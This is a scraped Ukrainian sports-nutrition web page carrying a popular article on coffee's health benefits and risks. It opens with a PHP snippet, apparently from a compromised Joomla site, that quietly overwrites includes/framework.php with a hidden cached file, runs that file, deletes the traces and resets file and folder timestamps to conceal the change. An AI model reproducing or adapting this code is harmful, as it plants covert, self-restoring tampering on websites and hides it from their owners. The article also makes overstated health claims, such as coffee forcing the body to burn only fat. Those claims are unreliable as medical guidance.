$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Кава - ворог чи друг? | Спортивне харчування - успіх у бодібілдингу та пауерліфтингу

Кава - ворог чи друг?

coffeeЯк вливає кава на організм людини це питання яке стало бестселлером в різних наукових дослідженнях.  Пити, чи не пити каву звичайно вирішувавти вам, а от що думають науковці з цьго проводу просто цікаво знати всім. Особливо коли кава це щоденний ритуал, і ви вже не раз думали що дуже вже воно схоже на залежність. Лякатись? Боротись? Чи просто насолоджуватись життям і смачною кавою?

Безсумнівна користь кави як засобу, що поліпшує психічну і фізичну працездатність. За допомогою наукового експерименту навіть була доведена користь кави для посилення розумових здібностей. Щоправда, це стосується лише тих, хто займається логічним мисленням

Користь кави для психічного здоров'я людини виражається ще й у тому, що він підвищує стійкість до стресів. А також знижує ризик впасти в депресію і покінчити життя самогубством, причому ризик знижується зі збільшенням кількості вживаного кави.

Велика користь кави для здоров'я. Всього 2 чашки кави в день знижують небезпеку виникнення раку печінки, підшлункової залози, товстої і прямої кишки. А у курців і ризик виникнення раку крові. Кава зменшує ризик захворіти хворобою Паркінсона, для цього жінкам потрібно вживати каву в помірних кількостях, а чоловікам у великих. Кава знижує ризик захворіти такими хворобами, як гіпертензія, гиперхолистеринемия, астма, мігрень, жовчокам'яна хвороба, цироз печінки, інфаркт, атеросклероз. 6 чашок кави в день знижують ризик появи діабету у чоловіків наполовину, а у жінок на третину.

Особливо помітна користь кави для чоловіків. Він покращує репродуктивну функцію чоловіків, підвищуючи рухливість сперматозоїдів.

Дуже відома користь кави для тих, хто хоче скинути зайві кілограми. Всього 1 чашка кави дозволяє займатися в спортзалі на третину інтенсивніше звичайного. А при дієтах і заняттях спортом кави примушує організм використовувати для отримання енергії не вуглеводи, а тільки жир. Що скажете? По-моєму, користь кави очевидна! А також користь кави для збереження молодості і краси полягає ще й у тому, що кава містить антиоксиданти.

До того ж кава часто використовують для налагодження травлення. Кава допомагає засвоєнню їжі, для чого потрібно випити чашечку-другу після смачного обіду.

Користь кави проявилася і в медицині. Кофеїн застосовують в якості терапії при захворюваннях які пригнічують центральну нервову систему. Наприклад, при отруєннях наркотиками і отрутами, інфекційних захворюваннях, недостатності серцево-судинної системи, спазмах судин. Кофеїн є одним зі складових багатьох ліків.

Користь кави викликала стільки досліджень, що в їх процесі було розвінчано стійкі міфи про каву. Наприклад, доведено, що кава не викликає ішемічну хворобу серця; не викликає рак органів, не викликає розвитку каліцтв у плода під час вагітності і багатьох інших захворювань.

Вчені з Університету Порто (Португалія) проаналізували результати 26 досліджень і виявили стійкий зв'язок між кавою і хворобою Паркінсона.

"Наше дослідження підтверджує вплив кофеїну на ризик розвитку хвороби Паркінсона", - говориться у роботі вчених, опублікованій в журналі Journal of Alzheimer's Disease.

З'ясувалося, що при регулярному вживанні кави, приблизно 2-3 чашки в день, ризик появи хвороби Паркінсона скорочується на 25%. Втім, для жінок цей показник суттєво менший: коли португальці окремо розглянули відомості з представницям прекрасної статі, найбільше зниження ризику склало лише 14%.
Нагадаємо, що в даний час не існує дієвих способів лікування хвороби Паркінсона. Більше того, вчені навіть не розуміють, що сприяє її розвитку.

Але як завжди все корисне в міру. Тим же хто п'є каву, як воду, слід знати, що більше 5 щоденних чашок цього напою (понад 300 мл) здатні, наприклад, порушити місячний цикл у жінок.

Обережними з кавою потрібно бути людям, у яких вже є такі порушення в роботі організму як серцева аритмія, напади нудоти, захворювання шлунково-кишкового тракту, синдром подразненої кишки, нервові тики, безсоння, підвищений рівень нервозності, тривожність.

P.S.  Ви повинні розуміти що під словом "кава" автор має  на увазі справжню нерозчинну каву  з зерен, а не ті кавоподібні сурогати в стікерах і банках які до справжньої кави мають таке саме відношення, як дитяча залізна дорога до "УкрЗалізниці".

 
Харчування-здоровий спосіб життя Кава - ворог чи друг?